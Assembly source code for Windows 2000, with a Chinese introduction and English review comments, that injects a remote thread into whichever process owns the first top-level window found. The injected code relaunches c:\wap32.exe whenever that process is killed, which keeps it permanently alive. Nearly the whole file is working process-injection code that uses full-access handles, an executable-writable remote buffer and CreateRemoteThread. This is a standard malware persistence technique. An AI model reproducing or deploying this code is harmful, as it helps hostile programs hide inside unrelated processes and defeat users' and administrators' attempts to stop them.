此段程序采用公开的 Win2k 远程线程注入技术，来保护指定进程始终处于运行状态。
生成 wap32.exe 并拷贝到 c:\ 下运行，则 wap32 进程不死。
include Win32.inc                       ; Win32 constants/prototypes (PROCESS_ALL_ACCESS, MEM_COMMIT, FALSE, NULL, ...)
.386                                    ; 32-bit instruction set, TASM-style syntax throughout
.model flat,stdcall                     ; flat model; the extended `call target,args` form used below pushes the listed args for a stdcall callee
.data                                   ; NOTE: the procedure that follows is deliberately assembled into the writable
                                        ; .data section rather than .code (the .code directive comes later in the file)
;-----------------------------------------------------------------------
; Protect2kProc — thread body that Start copies into another process
; (WriteProcessMemory) and starts there with CreateRemoteThread.
; C-equivalent: DWORD WINAPI Protect2kProc(DWORD ProcID)
; In:    ProcID = id of the process to watch (the remote-thread parameter)
; Out:   eax = return value of the last API call; nothing inspects it
; Clobb: eax, ebx, ecx, flags (ebx is stdcall callee-saved but is not preserved)
; Behaviour: OpenProcess(ProcID) -> WaitForSingleObject(handle, INFINITE)
;            -> WinExec(FileName, SW_SHOWNORMAL). It relaunches once and
;            exits; presumably the relaunched copy re-injects itself.
; Layout rules: every address is obtained at run time (call/pop of the
; dword slot that follows each call, or a displacement from the block's
; own location), so the body must stay free of absolute references. The
; three dd slots are filled in by Start before the copy is made, and
; FileName must remain directly after `endp` so the displacement computed
; at GetFileNameAddress is still valid after the copy.
; NOTE(review): the process handle held in ebx is never closed.
;-----------------------------------------------------------------------
Protect2kProc proc ProcID: dword
call GetKnlOpenProcess                  ; return address pushed = address of the slot on the next line
KnlOpenProcess dd ?                     ; slot: OpenProcess pointer, written by Start (mov KnlOpenProcess,eax)
GetKnlOpenProcess:
pop eax                                 ; eax = &KnlOpenProcess
call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID   ; eax = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcID)
or eax,eax
jz short ExitProtectProc                ; NULL handle -> give up silently
mov ebx,eax                             ; ebx = handle of the watched process
call GetKnlWaitForSingleObject          ; same call/pop trick for the next slot
KnlWaitForSingleObject dd ?             ; slot: WaitForSingleObject pointer, written by Start
GetKnlWaitForSingleObject:
pop eax                                 ; eax = &KnlWaitForSingleObject
call [eax],ebx,-1h                      ; WaitForSingleObject(handle, -1 = INFINITE): blocks until the watched process ends
call GetFileNameAddress                 ; return address pushed = run-time address of GetFileNameAddress
GetFileNameAddress:
pop ecx                                 ; ecx = run-time address of GetFileNameAddress
add ecx,offset FileName-offset GetFileNameAddress   ; ecx = run-time address of FileName (displacement, not absolute)
call GetKnlWinExec
KnlWinExec dd ?                         ; slot: WinExec pointer, written by Start
GetKnlWinExec:
pop eax                                 ; eax = &KnlWinExec
call [eax],ecx,01                       ; WinExec(FileName, 1 = SW_SHOWNORMAL): relaunch the watched program
ExitProtectProc:
ret                                     ; handle in ebx is left open
Protect2kProc endp
FileName db 'c:\wap32.exe',0            ; path relaunched by the injected code; must stay directly after
                                        ; Protect2kProc: it is reached by displacement and lies inside the
                                        ; 1000h-byte range that Start copies with WriteProcessMemory
KnlOpenProcessStr db 'OpenProcess',0    ; export names, resolved locally by GetProcAddress in Start
KnlWaitForObjectStr db 'WaitForSingleObject',0
KnlWinExecStr db 'WinExec',0            ; (these also fall inside the copied range but the remote code does not use them)
.code
extrn GetProcAddress: proc
extrn OpenProcess: proc
extrn FindWindowA: proc
extrn GetWindowThreadProcessId: proc
extrn VirtualAllocEx: proc
extrn VirtualFreeEx: proc
extrn WriteProcessMemory: proc
extrn GetCurrentProcessId: proc
extrn CreateRemoteThread: proc
extrn GetExitCodeThread: proc
extrn CloseHandle: proc
extrn WinExec: proc
extrn MessageBoxA: proc
extrn Sleep: proc
;-----------------------------------------------------------------------
; Start — program entry point (injector side).
; 1. Resolve OpenProcess / WaitForSingleObject / WinExec from a hard-coded
;    kernel32 base (077e60000h) and patch the pointers into the dd slots
;    inside Protect2kProc.
; 2. Take an arbitrary top-level window (FindWindowA(NULL,NULL)) and open
;    its owning process.
; 3. Allocate 1000h bytes there with protection 40h, copy Protect2kProc and
;    the data after it, and start a remote thread on the copy with our own
;    PID as the thread parameter.
; Register roles: ebx = target process handle, edi = remote buffer.
; Detection note: OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(RWX)
; -> WriteProcessMemory -> CreateRemoteThread is the canonical remote-thread
; injection chain that endpoint monitoring keys on.
; NOTE(review): the hard-coded module base ties this to one OS build; the
; thread handle returned by CreateRemoteThread is never closed; and the
; VirtualAllocEx failure path skips CloseHandle(ebx).
;-----------------------------------------------------------------------
Start:
call GetProcAddress,077e60000h,offset KnlOpenProcessStr   ; hard-coded module base, valid only for the build the author targeted
mov KnlOpenProcess,eax                  ; patch the slot inside Protect2kProc (before it is copied)
call GetProcAddress,077e60000h,offset KnlWaitForObjectStr
mov KnlWaitForSingleObject,eax
call GetProcAddress,077e60000h,offset KnlWinExecStr
mov KnlWinExec,eax
call FindWindowA,0,0                    ; NULL class and title: whichever top-level window is found first
push eax                                ; reserve a dword slot on the stack; receives the PID below
call GetWindowThreadProcessId,eax,esp   ; *esp = process id owning the window
call OpenProcess,PROCESS_ALL_ACCESS,FALSE   ; third argument (PID) is the slot pushed above; stdcall cleanup removes it
or eax,eax
jz short OpenProcessError
mov ebx,eax                             ; ebx = target process handle
call VirtualAllocEx,ebx,NULL,1000h,MEM_COMMIT,L 40h   ; 40h = PAGE_EXECUTE_READWRITE: writable and executable remote page
or eax,eax
jz short OpenProcessError               ; NOTE: ebx is left open on this path
mov edi,eax                             ; edi = remote buffer
push eax                                ; scratch dword: bytes written, then thread id, then exit code
call WriteProcessMemory,ebx,edi,OFF Protect2kProc,1000h,esp   ; copies 1000h bytes: the proc plus FileName and whatever follows in .data
call GetCurrentProcessId                ; eax = our PID -> thread parameter
call CreateRemoteThread,ebx,NULL,NULL,edi,eax,NULL,esp   ; start Protect2kProc(ourPID) in the target; *esp = thread id
call GetExitCodeThread,eax,esp          ; thread handle is never closed; the code only lands in the slot
pop eax                                 ; discard the scratch slot (exit code is ignored)
;call VirtualFreeEx,ebx,edi,1000h,MEM_DECOMMIT   ; left out, presumably because the remote thread still runs in that region
call CloseHandle,ebx
call Sleep,100h                         ; 100h milliseconds
call MessageBoxA,0,offset FileName,offset FileName,0   ; shows the relaunch path as both text and title
OpenProcessError:
ret
end Start